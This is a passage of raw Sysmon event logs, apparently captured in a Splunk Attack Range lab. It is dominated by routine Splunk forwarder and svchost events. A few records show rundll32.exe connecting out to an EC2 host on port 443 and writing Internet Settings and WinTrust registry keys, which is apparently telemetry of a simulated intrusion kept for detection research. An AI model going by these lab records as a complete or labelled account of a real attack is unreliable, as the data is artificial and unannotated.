23542300x80000000000000001060963Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:29:59.732{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ADB3AF3B1B94098AF08DC9E470BEB0C6,SHA256=28C750359B01B8DD0A01BFCED7B097B909822B77797C0EF014759E15548D0350,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529824Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:29:59.378{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529823Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:29:59.378{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0669AB3D8B1672C5FEE9D1A8F074B5CF,SHA256=A3443AE22F2D30E637DE12230602EB195CAC4DEEB2EE4D7EAC72B498E7739D38falsefalse - insufficient disk space 10341000x80000000000000001060962Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:29:59.033{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060961Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:29:59.033{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001529827Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:29:57.529{21761711-4F44-6080-945B-00000000BB01}5080C:\Windows\SysWOW64\rundll32.exeWIN-HOST-5\Administratortcptruefalse10.0.1.15win-host-5.attackrange.local64676-false34.218.235.219ec2-34-218-235-219.us-west-2.compute.amazonaws.com443https 11241100x80000000000000001529826Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:00.396{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529825Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:00.396{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F29286C1687CD968A93EA2DC8B68F6D,SHA256=EC36053A8C181A1B05D08B6B804929896B32C98B15B6726FF20EE5353CA5B674falsefalse - insufficient disk space 23542300x80000000000000001060966Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:00.737{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DF6608D9002F59958716008BC84C89B,SHA256=ADE9013244AA2631DDA75A1EEBA3E11CD50E339CCA66367C838E70D77B32C0C1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060965Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:00.034{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060964Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:00.034{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001060969Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:01.741{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D31866C17817D081BC80D1EA7C534A1D,SHA256=14664AB5F89BEEBA4CDB98D73F755FB92AA0C393E96EEB3AC645C5A74DF9410C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529829Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:01.399{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529828Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:01.399{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C03E96BD68C5CB260E4F303337201A99,SHA256=8622481CEB42661C119E9F4B9D39C0691079616F0413C92DBFD890E50FF4DC31falsefalse - insufficient disk space 10341000x80000000000000001060968Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:01.035{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060967Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:01.035{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001060974Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.748{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E288AAF630DC9F64C81F7C9B4D987A8,SHA256=ACCDF89F8144D39CEC57CB148053F77FB6769778551C8A7772BE4444FD063532,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529831Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:02.401{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529830Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:02.401{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5035000BD0E456BDE4D12B0463D01505,SHA256=2A5D28FFB9909002D9222E8FB2CD1D0E26145A822C16AF9C122B9DF47204434Cfalsefalse - insufficient disk space 23542300x80000000000000001060973Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.110{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24242E288AA9DA9FF63FA7110196DB08,SHA256=E2DD361BBE5B0FEACECDF11C63372C8E35A7D9D7292627859C082565626A0456,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001060972Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.109{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A70B7D1859496A525D4228BEFF7D06F4,SHA256=5DB7F4037E490B386D913EE0B786848F8B060CE4CA33C787223E989E1F5D2ABA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001060971Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.036{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060970Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:02.036{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001060978Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:03.764{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0EB04D0A722066DD3B0FB36F568D07C9,SHA256=70ADD62299D45D954ED4A8A7A377EAB5FA4A0DCB098D87C059EB1977C293F34C,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529835Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:03.488{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529834Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:03.488{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC0858B8266ECF30F6EC14D135B07EEF,SHA256=7639885DF2A250FEC338D4BA5531BDD6C62E1554D07D19EEF804E86F5B24197Bfalsefalse - insufficient disk space 354300x80000000000000001060977Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:29:57.790{761B69BB-8207-607D-CF00-00000000BA01}4116C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-982.attackrange.local1293-false10.0.1.12-8000- 10341000x80000000000000001060976Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:03.037{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060975Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:03.037{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001529833Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:03.203{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001529832Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:03.203{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F4C711326CEB73B11DCEC41FBDAC69B3,SHA256=6DE88609CA9B38DA835517E8239AA65041925E96942C353C77583535DA131AFFfalsefalse - insufficient disk space 23542300x80000000000000001060981Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:04.940{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B215CA837BBFBD51C0526A142B2BF8E,SHA256=5B406A01C90307ED0DBF340EFDC4B0A25D00A6773A0D638944EA67DB87D90A1A,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529838Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:04.506{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529837Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:04.506{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BBFBDE0F7D6665E5214DFC86E7F678FB,SHA256=936C2FC9429AC3C201D51B0B3AA8A47496CC158CA17BB3F1FEE1D55BAA0F1B9Dfalsefalse - insufficient disk space 10341000x80000000000000001060980Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:04.038{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060979Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:04.038{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x80000000000000001529836Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:01.739{21761711-8431-607D-C500-00000000BB01}3840C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-5.attackrange.local64677-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001060984Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:05.945{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5BE63D342F02DBFB149408661C8C2B40,SHA256=6CCDFB62E02B91EF6D5226BE8970B1BCAC835C8FD43AD61AE752E85BC659CBEB,IMPHASH=00000000000000000000000000000000falsetrue 12241200x80000000000000001529842Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:05.709{21761711-ED8A-607D-B212-00000000BB01}7572C:\Windows\SysWOW64\rundll32.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing 12241200x80000000000000001529841Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-CreateKey2021-04-21 17:30:05.709{21761711-ED8A-607D-B212-00000000BB01}7572C:\Windows\SysWOW64\rundll32.exeHKU\S-1-5-21-3386589612-1946705271-3951022823-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections 11241100x80000000000000001529840Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:05.508{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529839Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:05.508{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3708492426B55F235B642EEFCE7DCD93,SHA256=D433EF9E3B4EE508F87EC95E0219286C7459F7B5B0E270590F1E861AAA00489Efalsefalse - insufficient disk space 10341000x80000000000000001060983Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:05.039{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E2-607D-1F03-00000000BA01}5220C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001060982Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:05.039{761B69BB-818C-607D-0C00-00000000BA01}844972C:\Windows\system32\svchost.exe{761B69BB-84E4-607D-2203-00000000BA01}5440C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+3479f|C:\Windows\SYSTEM32\psmserviceexthost.dll+32739|C:\Windows\SYSTEM32\psmserviceexthost.dll+22de9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ee24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001060987Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 17:30:06.965{761B69BB-820D-607D-D800-00000000BA01}1064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60265DD36A215C21D325C59854A75D7E,SHA256=E5430C7ACF509034B5F65106ACBCF7CC4FCAC1A879EFB6E2588B58D4C9701325,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001529846Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.711{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Security2021-04-19 13:20:22.616 23542300x80000000000000001529845Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.711{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=039DFD744F6D487694DFEABA23C06722,SHA256=798944F6209BD70A50791D75124DDC9006851858DB2C6E27248B376C2BF5FF80falsefalse - insufficient disk space 11241100x80000000000000001529844Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.511{21761711-8437-607D-CE00-00000000BB01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_Operational2021-04-19 13:21:25.072 23542300x80000000000000001529843Microsoft-Windows-Sysmon/Operationalwin-host-5.attackrange.local-2021-04-21 17:30:06.511{21761711-8437-607D-CE00-00000000BB01}2032NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=46540E25008534245218E6F2AFC4E74C,SHA256=B216D2178E996A079536B7626050B9619B82071B61F674D0710702DEAD0027C4falsefalse - insufficient disk space 10341000x80000000000000001060986Microsoft-Windows-Sysmon/Operationalwin-dc-982.attackrange.local-2021-04-21 